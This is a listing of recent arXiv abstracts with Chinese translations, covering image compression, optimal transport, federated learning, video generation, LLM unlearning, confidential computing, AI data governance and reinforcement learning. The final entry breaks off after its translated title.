Image Compression for Machines (ICM) aims to compress images for machine vision tasks rather than human viewing. Current works predominantly concentrate on high-level tasks like object detection and semantic segmentation. However, the quality of original images is usually not guaranteed in the real world, leading to even worse perceptual quality or downstream task performance after compression. Low-level (LL) machine vision models, like image restoration models, can help improve such quality, and thereby their compression requirements should also be considered. In this paper, we propose a pioneered ICM framework for LL machine vision tasks, namely LL-ICM. By jointly optimizing compression and LL tasks, the proposed LL-ICM not only enriches its encoding ability in generalizing to versatile LL tasks but also optimizes the processing ability of down-stream LL task models, achieving mutual adaptation for image codecs and LL task models. Furthermore, we integrate large-scale vision-language models into the LL-ICM framework to generate more universal and distortion-robust feature embeddings for LL vision tasks. Therefore, one LL-ICM codec can generalize to multiple tasks. We establish a solid benchmark to evaluate LL-ICM, which includes extensive objective experiments by using both full and no-reference image quality assessments. Experimental results show that LL-ICM can achieve 22.65% BD-rate reductions over the state-of-the-art methods.
Updated: 2024-12-05 03:12:45
标题: LL-ICM:通过大型视觉语言模型实现低级机器视觉图像压缩
摘要: 图像压缩技术(ICM)旨在为机器视觉任务而非人类视觉压缩图像。目前的研究主要集中在高级任务,如目标检测和语义分割。然而,在现实世界中,原始图像的质量通常无法保证,导致压缩后的感知质量或下游任务性能甚至更糟。低级(LL)机器视觉模型,如图像恢复模型,可以帮助提高这种质量,因此应该考虑它们的压缩需求。在本文中,我们提出了一个针对低级机器视觉任务的开创性ICM框架,即LL-ICM。通过联合优化压缩和LL任务,所提出的LL-ICM不仅丰富了其在泛化到多样的LL任务方面的编码能力,还优化了下游LL任务模型的处理能力,实现了图像编解码器和LL任务模型的相互适应。此外,我们将大规模视觉语言模型整合到LL-ICM框架中,以为LL视觉任务生成更通用和失真鲁棒的特征嵌入。因此,一个LL-ICM编解码器可以泛化到多个任务。我们建立了一个坚实的基准来评估LL-ICM,其中包括使用全参考和无参考图像质量评估进行的广泛客观实验。实验结果表明,LL-ICM可以比最先进的方法实现22.65%的BD率降低。
更新时间: 2024-12-05 03:12:45
领域: cs.CV,cs.AI
Sinkhorn Algorithm for Sequentially Composed Optimal Transports
Sinkhorn algorithm is the de-facto standard approximation algorithm for optimal transport, which has been applied to a variety of applications, including image processing and natural language processing. In theory, the proof of its convergence follows from the convergence of the Sinkhorn--Knopp algorithm for the matrix scaling problem, and Altschuler et al. show that its worst-case time complexity is in near-linear time. Very recently, sequentially composed optimal transports were proposed by Watanabe and Isobe as a hierarchical extension of optimal transports. In this paper, we present an efficient approximation algorithm, namely Sinkhorn algorithm for sequentially composed optimal transports, for its entropic regularization. Furthermore, we present a theoretical analysis of the Sinkhorn algorithm, namely (i) its exponential convergence to the optimal solution with respect to the Hilbert pseudometric, and (ii) a worst-case complexity analysis for the case of one sequential composition.
Updated: 2024-12-05 03:06:08
标题: Sinkhorn算法用于顺序组合的最优输运
摘要: Sinkhorn算法是最优输运的事实上的标准近似算法,已被应用于各种应用程序,包括图像处理和自然语言处理。理论上,其收敛性的证明源自Sinkhorn-Knopp算法对矩阵缩放问题的收敛性,Altschuler等人表明其最坏情况时间复杂度接近线性时间。最近,渡边和磯部提出了顺序组成的最优输运作为最优输运的分层扩展。在本文中,我们提出了一种高效的近似算法,即Sinkhorn算法用于顺序组成的最优输运,以进行熵正则化。此外,我们对Sinkhorn算法进行了理论分析,即(i)其相对于希尔伯特伪度量的最优解的指数收敛性,以及(ii)对于单个顺序组成情况的最坏情况复杂性分析。
更新时间: 2024-12-05 03:06:08
领域: cs.DS,cs.LG,cs.NA,math.NA
Movie Gen: SWOT Analysis of Meta's Generative AI Foundation Model for Transforming Media Generation, Advertising, and Entertainment Industries
Generative AI is reshaping the media landscape, enabling unprecedented capabilities in video creation, personalization, and scalability. This paper presents a comprehensive SWOT analysis of Metas Movie Gen, a cutting-edge generative AI foundation model designed to produce 1080p HD videos with synchronized audio from simple text prompts. We explore its strengths, including high-resolution video generation, precise editing, and seamless audio integration, which make it a transformative tool across industries such as filmmaking, advertising, and education. However, the analysis also addresses limitations, such as constraints on video length and potential biases in generated content, which pose challenges for broader adoption. In addition, we examine the evolving regulatory and ethical considerations surrounding generative AI, focusing on issues like content authenticity, cultural representation, and responsible use. Through comparative insights with leading models like DALL-E and Google Imagen, this paper highlights Movie Gens unique features, such as video personalization and multimodal synthesis, while identifying opportunities for innovation and areas requiring further research. Our findings provide actionable insights for stakeholders, emphasizing both the opportunities and challenges of deploying generative AI in media production. This work aims to guide future advancements in generative AI, ensuring scalability, quality, and ethical integrity in this rapidly evolving field.
Updated: 2024-12-05 03:01:53
标题: 电影Gen:Meta的生成式人工智能基础模型在转变媒体生成、广告和娱乐产业中的SWOT分析
摘要: 生成式人工智能正在重塑媒体格局,为视频创作、个性化和可扩展性提供了前所未有的能力。本文介绍了Metas Movie Gen的SWOT分析,这是一个先进的生成式人工智能基础模型,旨在通过简单的文本提示生成1080p高清视频并同步音频。我们探讨了其优势,包括高分辨率视频生成、精确编辑和无缝音频整合,这使其成为跨行业如电影制作、广告和教育的转型工具。然而,分析也提到了一些限制,如视频长度限制和生成内容中潜在的偏见,这给更广泛采用带来了挑战。此外,我们还探讨了围绕生成式人工智能不断发展的监管和伦理考虑,关注内容真实性、文化代表性和负责任使用等问题。通过与领先模型如DALL-E和Google Imagen的比较洞见,本文突出了Movie Gen的独特特点,如视频个性化和多模态合成,同时确定了创新机会和需要进一步研究的领域。我们的发现为利益相关者提供了可操作的见解,强调了在媒体制作中部署生成式人工智能的机遇和挑战。这项工作旨在引导生成式人工智能未来的发展,确保在这个快速发展的领域中实现可扩展性、质量和伦理完整性。
更新时间: 2024-12-05 03:01:53
领域: cs.AI,cs.CV
Exploring Kolmogorov-Arnold networks for realistic image sharpness assessment
Score prediction is crucial in evaluating realistic image sharpness based on collected informative features. Recently, Kolmogorov-Arnold networks (KANs) have been developed and witnessed remarkable success in data fitting. This study introduces the Taylor series-based KAN (TaylorKAN). Then, different KANs are explored in four realistic image databases (BID2011, CID2013, CLIVE, and KonIQ-10k) to predict the scores by using 15 mid-level features and 2048 high-level features. Compared to support vector regression, results show that KANs are generally competitive or superior, and TaylorKAN is the best one when mid-level features are used. This is the first study to investigate KANs on image quality assessment that sheds some light on how to select and further improve KANs in related tasks.
Updated: 2024-12-05 02:59:02
标题: 探索 Kolmogorov-Arnold 网络用于实际图像清晰度评估
摘要: 评分预测在基于收集的信息特征评估真实图像清晰度方面至关重要。最近,科尔莫戈洛夫-阿诺德网络(KANs)已经被开发出来,并在数据拟合方面取得了显著成功。本研究介绍了基于泰勒级数的KAN(TaylorKAN)。然后,在四个真实图像数据库(BID2011,CID2013,CLIVE和KonIQ-10k)中探索不同的KAN,通过使用15个中级特征和2048个高级特征来预测分数。与支持向量回归相比,结果表明KANs通常具有竞争力或优势,而当使用中级特征时,TaylorKAN是最好的。这是第一项研究,探讨了在图像质量评估中如何选择和进一步改进KANs的问题,为相关任务中如何选择和进一步改进KANs提供了一些启示。
更新时间: 2024-12-05 02:59:02
领域: cs.CV,cs.LG
The Effect of Personalization in FedProx: A Fine-grained Analysis on Statistical Accuracy and Communication Efficiency
FedProx is a simple yet effective federated learning method that enables model personalization via regularization. Despite remarkable success in practice, a rigorous analysis of how such a regularization provably improves the statistical accuracy of each client's local model hasn't been fully established. Setting the regularization strength heuristically presents a risk, as an inappropriate choice may even degrade accuracy. This work fills in the gap by analyzing the effect of regularization on statistical accuracy, thereby providing a theoretical guideline for setting the regularization strength for achieving personalization. We prove that by adaptively choosing the regularization strength under different statistical heterogeneity, FedProx can consistently outperform pure local training and achieve a \textit{minimax-optimal} statistical rate. In addition, to shed light on resource allocation, we design an algorithm, provably showing that stronger personalization reduces communication complexity without increasing the computation cost overhead. Finally, our theory is validated on both synthetic and real-world datasets and its generalizability is verified in a non-convex setting.
Updated: 2024-12-05 02:58:20
标题: FedProx中个性化的影响:对统计准确性和通信效率的细粒度分析
摘要: FedProx是一种简单而有效的联合学习方法,通过正则化实现模型个性化。尽管在实践中取得了显著成功,但对于这种正则化如何明显提高每个客户端本地模型的统计准确性的严格分析尚未完全确立。根据经验设置正则化强度存在风险,因为选择不当甚至可能降低准确性。本文通过分析正则化对统计准确性的影响填补了这一空白,从而为设置正则化强度以实现个性化提供了理论指导。我们证明,通过在不同统计异质性下自适应选择正则化强度,FedProx可以始终优于纯本地训练,并实现一种\textit{极小化-最优}的统计速率。此外,为了阐明资源分配,我们设计了一种算法,证明了更强的个性化可以减少通信复杂性,而不会增加计算成本开销。最后,我们的理论在合成和真实数据集上得到验证,其泛化性在非凸设置中得到验证。
更新时间: 2024-12-05 02:58:20
领域: stat.ML,cs.DC,cs.LG,math.ST,stat.CO,stat.TH
PEMF-VVTO: Point-Enhanced Video Virtual Try-on via Mask-free Paradigm
Video Virtual Try-on aims to fluently transfer the garment image to a semantically aligned try-on area in the source person video. Previous methods leveraged the inpainting mask to remove the original garment in the source video, thus achieving accurate garment transfer on simple model videos. However, when these methods are applied to realistic video data with more complex scene changes and posture movements, the overly large and incoherent agnostic masks will destroy the essential spatial-temporal information of the original video, thereby inhibiting the fidelity and coherence of the try-on video. To alleviate this problem, we propose a novel point-enhanced mask-free video virtual try-on framework (PEMF-VVTO). Specifically, we first leverage the pre-trained mask-based try-on model to construct large-scale paired training data (pseudo-person samples). Training on these mask-free data enables our model to perceive the original spatial-temporal information while realizing accurate garment transfer. Then, based on the pre-acquired sparse frame-cloth and frame-frame point alignments, we design the point-enhanced spatial attention (PSA) and point-enhanced temporal attention (PTA) to further improve the try-on accuracy and video coherence of the mask-free model. Concretely, PSA explicitly guides the garment transfer to desirable locations through the sparse semantic alignments of video frames and cloth. PTA exploits the temporal attention on sparse point correspondences to enhance the smoothness of generated videos. Extensive qualitative and quantitative experiments clearly illustrate that our PEMF-VVTO can generate more natural and coherent try-on videos than existing state-of-the-art methods.
Updated: 2024-12-05 02:57:24
标题: PEMF-VVTO:通过无需面具范式实现的点增强视频虚拟试穿
摘要: 视频虚拟试穿旨在将服装图像流畅地转移到源视频中与语义对齐的试穿区域。先前的方法利用修补蒙版来移除源视频中的原始服装,从而在简单模型视频上实现准确的服装转移。然而,当这些方法应用于具有更复杂场景变化和姿势移动的现实视频数据时,过大和不连贯的不可知蒙版将破坏原始视频的基本时空信息,从而抑制试穿视频的保真度和连贯性。为了缓解这一问题,我们提出了一种新颖的点增强无蒙版视频虚拟试穿框架(PEMF-VVTO)。具体而言,我们首先利用预训练的基于蒙版的试穿模型来构建大规模配对训练数据(伪人样本)。在这些无蒙版数据上训练使得我们的模型能够感知原始的时空信息,同时实现准确的服装转移。然后,基于预先获取的稀疏帧-衣服和帧-帧点对齐,我们设计了点增强空间注意力(PSA)和点增强时间注意力(PTA)来进一步提高无蒙版模型的试穿准确性和视频连贯性。具体来说,PSA通过视频帧和布料的稀疏语义对齐明确引导服装转移到期望的位置。PTA利用稀疏点对应关系上的时间注意力来增强生成视频的平滑性。广泛的定性和定量实验清楚地说明我们的PEMF-VVTO比现有最先进方法能够生成更自然和连贯的试穿视频。
更新时间: 2024-12-05 02:57:24
领域: cs.CV,cs.AI
Hallo3: Highly Dynamic and Realistic Portrait Image Animation with Diffusion Transformer Networks
Existing methodologies for animating portrait images face significant challenges, particularly in handling non-frontal perspectives, rendering dynamic objects around the portrait, and generating immersive, realistic backgrounds. In this paper, we introduce the first application of a pretrained transformer-based video generative model that demonstrates strong generalization capabilities and generates highly dynamic, realistic videos for portrait animation, effectively addressing these challenges. The adoption of a new video backbone model makes previous U-Net-based methods for identity maintenance, audio conditioning, and video extrapolation inapplicable. To address this limitation, we design an identity reference network consisting of a causal 3D VAE combined with a stacked series of transformer layers, ensuring consistent facial identity across video sequences. Additionally, we investigate various speech audio conditioning and motion frame mechanisms to enable the generation of continuous video driven by speech audio. Our method is validated through experiments on benchmark and newly proposed wild datasets, demonstrating substantial improvements over prior methods in generating realistic portraits characterized by diverse orientations within dynamic and immersive scenes. Further visualizations and the source code are available at: https://fudan-generative-vision.github.io/hallo3/.
Updated: 2024-12-05 02:55:56
标题: Hallo3:采用扩散变换器网络实现高度动态和逼真的肖像图像动画
摘要: 现有的为动画肖像图像提供方法面临着重大挑战,特别是在处理非正面视角、渲染肖像周围的动态对象以及生成沉浸式、逼真的背景方面。本文介绍了一个基于预训练变压器的视频生成模型的首次应用,展示了强大的泛化能力,并为肖像动画生成了高度动态、逼真的视频,有效解决了这些挑战。采用了新的视频骨干模型,使先前基于U-Net的方法在身份维护、音频调节和视频外推方面不适用。为了解决这一局限性,我们设计了一个由因果3D VAE和一系列堆叠的变压器层组成的身份参考网络,确保视频序列中的面部身份一致性。此外,我们研究了各种语音音频调节和动作帧机制,以实现由语音音频驱动的连续视频生成。我们的方法通过在基准和新提出的野外数据集上的实验验证,显示出在生成具有不同方向的动态和沉浸式场景中的逼真肖像方面相对于先前方法的实质性改进。更多可视化和源代码可在以下网址找到:https://fudan-generative-vision.github.io/hallo3/。
更新时间: 2024-12-05 02:55:56
领域: cs.CV,cs.GR,cs.LG
Mechanistic Unlearning: Robust Knowledge Unlearning and Editing via Mechanistic Localization
Methods for knowledge editing and unlearning in large language models seek to edit or remove undesirable knowledge or capabilities without compromising general language modeling performance. This work investigates how mechanistic interpretability -- which, in part, aims to identify model components (circuits) associated to specific interpretable mechanisms that make up a model capability -- can improve the precision and effectiveness of editing and unlearning. We find a stark difference in unlearning and edit robustness when training components localized by different methods. We highlight an important distinction between methods that localize components based primarily on preserving outputs, and those finding high level mechanisms with predictable intermediate states. In particular, localizing edits/unlearning to components associated with the lookup-table mechanism for factual recall 1) leads to more robust edits/unlearning across different input/output formats, and 2) resists attempts to relearn the unwanted information, while also reducing unintended side effects compared to baselines, on both a sports facts dataset and the CounterFact dataset across multiple models. We also find that certain localized edits disrupt the latent knowledge in the model more than any other baselines, making unlearning more robust to various attacks.
Updated: 2024-12-05 02:55:35
标题: 机械学习:通过机械局部化实现的稳健知识遗忘和编辑
摘要: 大型语言模型中的知识编辑和遗忘方法旨在编辑或删除不良知识或能力,而不影响一般语言建模性能。这项工作探讨了机械可解释性如何提高编辑和遗忘的精度和有效性,部分目的是识别与模型能力相关的可解释机制的模型组件(电路)。当训练组件由不同方法定位时,我们发现在遗忘和编辑的稳健性方面存在明显差异。我们强调了基于主要保留输出的方法和发现具有可预测中间状态的高级机制之间的重要区别。特别是,将编辑/遗忘局限于与事实回忆的查找表机制相关联的组件1)导致跨不同输入/输出格式更稳健的编辑/遗忘,2)抵制重新学习不需要的信息的尝试,同时与基准相比降低意外副作用,在体育事实数据集和CounterFact数据集上跨多个模型。我们还发现,某些局部编辑会破坏模型中的潜在知识,比任何其他基线都更加稳健地遗忘各种攻击。
更新时间: 2024-12-05 02:55:35
领域: cs.LG,cs.CL
Marginal Causal Flows for Validation and Inference
Investigating the marginal causal effect of an intervention on an outcome from complex data remains challenging due to the inflexibility of employed models and the lack of complexity in causal benchmark datasets, which often fail to reproduce intricate real-world data patterns. In this paper we introduce Frugal Flows, a novel likelihood-based machine learning model that uses normalising flows to flexibly learn the data-generating process, while also directly inferring the marginal causal quantities from observational data. We propose that these models are exceptionally well suited for generating synthetic data to validate causal methods. They can create synthetic datasets that closely resemble the empirical dataset, while automatically and exactly satisfying a user-defined average treatment effect. To our knowledge, Frugal Flows are the first generative model to both learn flexible data representations and also exactly parameterise quantities such as the average treatment effect and the degree of unobserved confounding. We demonstrate the above with experiments on both simulated and real-world datasets.
Updated: 2024-12-05 02:49:36
标题: 边缘因果流用于验证和推断
摘要: 调查干预对结果的边际因果效应在复杂数据中仍然具有挑战性,这是因为所采用的模型缺乏灵活性,而因果基准数据集的复杂性也不足,往往无法复制复杂的真实世界数据模式。在本文中,我们介绍了一种新颖的基于似然的机器学习模型Frugal Flows,它利用标准化流灵活地学习数据生成过程,同时直接推断观察数据中的边际因果量。我们认为这些模型非常适合生成合成数据来验证因果方法。它们可以创建与实证数据集密切相似的合成数据集,同时自动且准确地满足用户定义的平均处理效应。据我们所知,Frugal Flows是第一个既学习灵活数据表示又准确参数化诸如平均处理效应和未观察到的混杂程度等量的生成模型。我们通过对模拟和真实世界数据集的实验来证明以上观点。
更新时间: 2024-12-05 02:49:36
领域: cs.LG,cs.AI,stat.ME,stat.ML
A large language model-type architecture for high-dimensional molecular potential energy surfaces
Computing high dimensional potential surfaces for molecular and materials systems is considered to be a great challenge in computational chemistry with potential impact in a range of areas including fundamental prediction of reaction rates. In this paper we design and discuss an algorithm that has similarities to large language models in generative AI and natural language processing. Specifically, we represent a molecular system as a graph which contains a set of nodes, edges, faces etc. Interactions between these sets, which represent molecular subsystems in our case, are used to construct the potential energy surface for a reasonably sized chemical system with 51 dimensions. Essentially a family of neural networks that pertain to the graph-based subsystems, get the job done for this 51 dimensional system. We then ask if this same family of lower-dimensional neural networks can be transformed to provide accurate predictions for a 186 dimensional potential surface. We find that our algorithm does provide reasonably accurate results for this larger dimensional problem with sub-kcal/mol accuracy for the higher dimensional potential surface problem.
Updated: 2024-12-05 02:48:49
标题: 一个用于高维分子势能面的大型语言模型类型架构
摘要: 在计算化学中,计算分子和材料系统的高维势能表面被认为是一个巨大的挑战,可能影响到包括基本反应速率预测在内的多个领域。本文设计并讨论了一个算法,该算法类似于生成式人工智能和自然语言处理中的大型语言模型。具体来说,我们将分子系统表示为一个包含一组节点、边缘、面等的图形。这些集合之间的相互作用用来构建一个包含51个维度的化学系统的势能表面。基本上,一系列神经网络与基于图形的子系统相关联,为这个51维系统完成工作。然后我们探讨是否可以将这组低维神经网络转化为提供准确预测的186维势能表面。我们发现,我们的算法确实为这个更大维度的问题提供了相当准确的结果,对于更高维度的势能表面问题,准确度达到了亚千卡/摩尔。
更新时间: 2024-12-05 02:48:49
领域: cs.LG,physics.atm-clus,physics.chem-ph,physics.comp-ph
Residual Hyperbolic Graph Convolution Networks
Hyperbolic graph convolutional networks (HGCNs) have demonstrated representational capabilities of modeling hierarchical-structured graphs. However, as in general GCNs, over-smoothing may occur as the number of model layers increases, limiting the representation capabilities of most current HGCN models. In this paper, we propose residual hyperbolic graph convolutional networks (R-HGCNs) to address the over-smoothing problem. We introduce a hyperbolic residual connection function to overcome the over-smoothing problem, and also theoretically prove the effectiveness of the hyperbolic residual function. Moreover, we use product manifolds and HyperDrop to facilitate the R-HGCNs. The distinctive features of the R-HGCNs are as follows: (1) The hyperbolic residual connection preserves the initial node information in each layer and adds a hyperbolic identity mapping to prevent node features from being indistinguishable. (2) Product manifolds in R-HGCNs have been set up with different origin points in different components to facilitate the extraction of feature information from a wider range of perspectives, which enhances the representing capability of R-HGCNs. (3) HyperDrop adds multiplicative Gaussian noise into hyperbolic representations, such that perturbations can be added to alleviate the over-fitting problem without deconstructing the hyperbolic geometry. Experiment results demonstrate the effectiveness of R-HGCNs under various graph convolution layers and different structures of product manifolds.
Updated: 2024-12-05 02:38:45
标题: 剩余的双曲图卷积网络
摘要: 双曲图卷积网络(HGCNs)已经展示了建模分层结构图的表征能力。然而,与一般的GCNs一样,随着模型层数的增加,过度平滑可能会发生,限制了大多数当前HGCN模型的表征能力。在本文中,我们提出了残差双曲图卷积网络(R-HGCNs)来解决过度平滑问题。我们引入了一个双曲残差连接函数,以克服过度平滑问题,并在理论上证明了双曲残差函数的有效性。此外,我们使用乘积流形和HyperDrop来促进R-HGCNs。R-HGCNs的独特特点如下:(1)双曲残差连接在每一层中保留初始节点信息,并添加双曲恒等映射,以防止节点特征变得不可区分。(2)R-HGCNs中的乘积流形在不同组件中设有不同的原点,以便从更广泛的视角提取特征信息,增强R-HGCNs的表征能力。(3)HyperDrop将乘法高斯噪声添加到双曲表示中,以便添加扰动以缓解过拟合问题,而不会破坏双曲几何。实验结果表明,在不同的图卷积层和乘积流形结构下,R-HGCNs的有效性。
更新时间: 2024-12-05 02:38:45
领域: cs.LG
Blindfold: Confidential Memory Management by Untrusted Operating System
Confidential Computing (CC) has received increasing attention in recent years as a mechanism to protect user data from untrusted operating systems (OSes). Existing CC solutions hide confidential memory from the OS and/or encrypt it to achieve confidentiality. In doing so, they render OS memory optimization unusable or complicate the trusted computing base (TCB) required for optimization. This paper presents our results toward overcoming these limitations, synthesized in a CC design named Blindfold. Like many other CC solutions, Blindfold relies on a small trusted software component running at a higher privilege level than the kernel, called Guardian. It features three techniques that can enhance existing CC solutions. First, instead of nesting page tables, Guardian mediates how the OS accesses memory and handles exceptions by switching page and interrupt tables. Second, Blindfold employs a lightweight capability system to regulate the kernel semantic access to user memory, unifying case-by-case approaches in previous work. Finally, Blindfold provides carefully designed secure ABI for confidential memory management without encryption. We report an implementation of Blindfold that works on ARMv8-A/Linux. Using Blindfold prototype, we are able to evaluate the cost of enabling confidential memory management by the untrusted Linux kernel. We show Blindfold has a smaller runtime TCB than related systems and enjoys competitive performance. More importantly, we show that the Linux kernel, including all of its memory optimizations except memory compression, can function properly for confidential memory. This requires only about 400 lines of kernel modifications.
Updated: 2024-12-05 02:38:03
标题: 蒙眼:不受信任操作系统的机密内存管理
摘要: 机密计算(CC)近年来备受关注,作为一种保护用户数据免受不受信任的操作系统(OSes)侵害的机制。现有的CC解决方案隐藏机密内存免受OS的访问和/或对其进行加密以实现保密性。在这样做的过程中,它们使OS内存优化无法使用或使用于优化所需的受信任计算基础(TCB)变得复杂。本文提出了我们针对这些限制所采取的措施,综合在一个名为Blindfold的CC设计中。与许多其他CC解决方案一样,Blindfold依赖于一个在比内核更高特权级别运行的小型受信任软件组件,称为Guardian。它采用三种技术来增强现有的CC解决方案。首先,Guardian通过切换页表和中断表来调解OS对内存的访问和处理异常,而不是嵌套页表。其次,Blindfold采用轻量级的能力系统来规范内核对用户内存的语义访问,统一了以往工作中的逐案处理方法。最后,Blindfold在不使用加密的情况下提供了精心设计的安全ABI用于机密内存管理。我们报告了在ARMv8-A/Linux上运行的Blindfold实现。利用Blindfold原型,我们能够评估启用不受信任的Linux内核进行机密内存管理的成本。我们展示Blindfold具有比相关系统更小的运行时TCB,并享有竞争性能。更重要的是,我们展示Linux内核,包括所有内存优化,除了内存压缩,都可以正常运行机密内存。这仅需要大约400行内核修改。
更新时间: 2024-12-05 02:38:03
领域: cs.CR,cs.OS
Towards Data Governance of Frontier AI Models
Data is essential to train and fine-tune today's frontier artificial intelligence (AI) models and to develop future ones. To date, academic, legal, and regulatory work has primarily addressed how data can directly harm consumers and creators, such as through privacy breaches, copyright infringements, and bias and discrimination. Our work, instead, focuses on the comparatively neglected question of how data can enable new governance capacities for frontier AI models. This approach for "frontier data governance" opens up new avenues for monitoring and mitigating risks from advanced AI models, particularly as they scale and acquire specific dangerous capabilities. Still, frontier data governance faces challenges that stem from the fundamental properties of data itself: data is non-rival, often non-excludable, easily replicable, and increasingly synthesizable. Despite these inherent difficulties, we propose a set of policy mechanisms targeting key actors along the data supply chain, including data producers, aggregators, model developers, and data vendors. We provide a brief overview of 15 governance mechanisms, of which we centrally introduce five, underexplored policy recommendations. These include developing canary tokens to detect unauthorized use for producers; (automated) data filtering to remove malicious content for pre-training and post-training datasets; mandatory dataset reporting requirements for developers and vendors; improved security for datasets and data generation algorithms; and know-your-customer requirements for vendors. By considering data not just as a source of potential harm, but as a critical governance lever, this work aims to equip policymakers with a new tool for the governance and regulation of frontier AI models.
Updated: 2024-12-05 02:37:51
标题: 朝着前沿人工智能模型的数据治理
摘要: 数据对于训练和调优当今前沿人工智能(AI)模型以及开发未来模型至关重要。迄今为止,学术、法律和监管工作主要关注数据如何直接危害消费者和创作者,比如通过隐私泄露、侵犯版权以及偏见和歧视等方式。相反,我们的工作专注于一个相对被忽视的问题,即数据如何能够为前沿AI模型带来新的治理能力。这种“前沿数据治理”的方法为监测和缓解高级AI模型的风险开辟了新的途径,特别是在它们扩展并获得特定危险能力时。然而,前沿数据治理面临来自数据本身基本属性的挑战:数据是不竞争的,通常是不排斥的,易于复制,并且越来越容易合成。尽管存在这些固有困难,我们提出一套针对数据供应链中的关键参与者的政策机制,包括数据生产者、聚合器、模型开发者和数据供应商。我们简要介绍了15种治理机制,其中我们重点介绍了五项未充分探讨的政策建议。这些建议包括开发用于检测生产者未经授权使用的“金丝雀令牌”;(自动化的)数据过滤以去除预训练和后训练数据集中的恶意内容;开发者和供应商的强制数据集报告要求;改进数据集和数据生成算法的安全性;以及供应商的了解客户要求。通过不仅将数据视为潜在危害的来源,而且将其视为关键的治理杠杆,这项工作旨在为决策者提供一种新的工具,用于治理和监管前沿AI模型。
更新时间: 2024-12-05 02:37:51
领域: cs.AI
Beyond the Binary: Capturing Diverse Preferences With Reward Regularization
Large language models (LLMs) are increasingly deployed via public-facing interfaces to interact with millions of users, each with diverse preferences. Despite this, preference tuning of LLMs predominantly relies on reward models trained using binary judgments where annotators select the preferred choice out of pairs of model outputs. In this work, we argue that this reliance on binary choices does not capture the broader, aggregate preferences of the target user in real-world tasks. We propose a taxonomy that identifies two dimensions of subjectivity where different users disagree on the preferred output-namely, the Plurality of Responses to Prompts, where prompts allow for multiple correct answers, and the Indistinguishability of Responses, where candidate outputs are paraphrases of each other. We show that reward models correlate weakly with user preferences in these cases. As a first step to address this issue, we introduce a simple yet effective method that augments existing binary preference datasets with synthetic preference judgments to estimate potential user disagreement. Incorporating these via a margin term as a form of regularization during model training yields predictions that better align with the aggregate user preferences.
Updated: 2024-12-05 02:35:46
标题: 超越二元选择:通过奖励规范捕捉多样化偏好
摘要: 大型语言模型(LLMs)越来越多地通过面向公众的界面部署,与数百万具有不同偏好的用户进行交互。尽管如此,LLMs的偏好调整主要依赖使用二进制判断训练的奖励模型,在这种情况下,注释者在模型输出对中选择首选选择。在这项工作中,我们认为这种对二进制选择的依赖性无法捕捉真实世界任务中目标用户的更广泛、综合的偏好。我们提出了一个分类法,确定了两个主观性维度,即不同用户在首选输出上存在分歧的多样性回应和回应的难以区分性,其中提示允许多个正确答案,并且候选输出是彼此的释义。我们展示奖励模型在这些情况下与用户偏好之间的弱相关性。作为解决这个问题的第一步,我们介绍了一种简单而有效的方法,通过合成偏好判断来增加现有的二进制偏好数据集,以估计潜在的用户分歧。通过在模型训练过程中将这些合并为一种正则化形式的边距项,可以产生更符合综合用户偏好的预测。
更新时间: 2024-12-05 02:35:46
领域: cs.CL,cs.AI
Accelerating Proximal Policy Optimization Learning Using Task Prediction for Solving Environments with Delayed Rewards
In this paper, we tackle the challenging problem of delayed rewards in reinforcement learning (RL). While Proximal Policy Optimization (PPO) has emerged as a leading Policy Gradient method, its performance can degrade under delayed rewards. We introduce two key enhancements to PPO: a hybrid policy architecture that combines an offline policy (trained on expert demonstrations) with an online PPO policy, and a reward shaping mechanism using Time Window Temporal Logic (TWTL). The hybrid architecture leverages offline data throughout training while maintaining PPO's theoretical guarantees. Building on the monotonic improvement framework of Trust Region Policy Optimization (TRPO), we prove that our approach ensures improvement over both the offline policy and previous iterations, with a bounded performance gap of $(2\varsigma\gamma\alpha^2)/(1-\gamma)^2$, where $\alpha$ is the mixing parameter, $\gamma$ is the discount factor, and $\varsigma$ bounds the expected advantage. Additionally, we prove that our TWTL-based reward shaping preserves the optimal policy of the original problem. TWTL enables formal translation of temporal objectives into immediate feedback signals that guide learning. We demonstrate the effectiveness of our approach through extensive experiments on an inverted pendulum and a lunar lander environments, showing improvements in both learning speed and final performance compared to standard PPO and offline-only approaches.
Updated: 2024-12-05 02:30:43
标题: 利用任务预测加速近端策略优化学习,解决延迟奖励环境
摘要: 在这篇论文中,我们解决了强化学习(RL)中延迟奖励的挑战性问题。虽然Proximal Policy Optimization(PPO)已经成为领先的策略梯度方法,但其性能在延迟奖励下可能会下降。我们对PPO进行了两个关键增强:一个混合策略架构,将离线策略(在专家示范中训练)与在线PPO策略相结合,以及使用时间窗口时间逻辑(TWTL)的奖励塑造机制。混合架构在整个训练过程中利用离线数据,同时保持PPO的理论保证。在建立在信任区域策略优化(TRPO)的单调改进框架基础上,我们证明了我们的方法确保了对离线策略和先前迭代的改进,性能差距有界为$(2\varsigma\gamma\alpha^2)/(1-\gamma)^2$,其中$\alpha$是混合参数,$\gamma$是折现因子,$\varsigma$限制了预期优势。另外,我们证明了基于TWTL的奖励塑造保留了原始问题的最优策略。TWTL能够将时间目标形式化为指导学习的即时反馈信号。我们通过对倒立摆和月球着陆器环境进行大量实验,展示了我们的方法在学习速度和最终性能方面相对于标准PPO和仅离线方法的改进效果。
更新时间: 2024-12-05 02:30:43
领域: cs.LG,cs.AI
Deep Implicit Optimization enables Robust Learnable Features for Deformable Image Registration
Deep Learning in Image Registration (DLIR) methods have been tremendously successful in image registration due to their speed and ability to incorporate weak label supervision at training time. However, existing DLIR methods forego many of the benefits and invariances of optimization methods. The lack of a task-specific inductive bias in DLIR methods leads to suboptimal performance, especially in the presence of domain shift. Our method aims to bridge this gap between statistical learning and optimization by explicitly incorporating optimization as a layer in a deep network. A deep network is trained to predict multi-scale dense feature images that are registered using a black box iterative optimization solver. This optimal warp is then used to minimize image and label alignment errors. By implicitly differentiating end-to-end through an iterative optimization solver, we explicitly exploit invariances of the correspondence matching problem induced by the optimization, while learning registration and label-aware features, and guaranteeing the warp functions to be a local minima of the registration objective in the feature space. Our framework shows excellent performance on in-domain datasets, and is agnostic to domain shift such as anisotropy and varying intensity profiles. For the first time, our method allows switching between arbitrary transformation representations (free-form to diffeomorphic) at test time with zero retraining. End-to-end feature learning also facilitates interpretability of features and arbitrary test-time regularization, which is not possible with existing DLIR methods.
Updated: 2024-12-05 02:26:30
标题: 深度隐式优化实现形变图像配准的稳健可学习特征
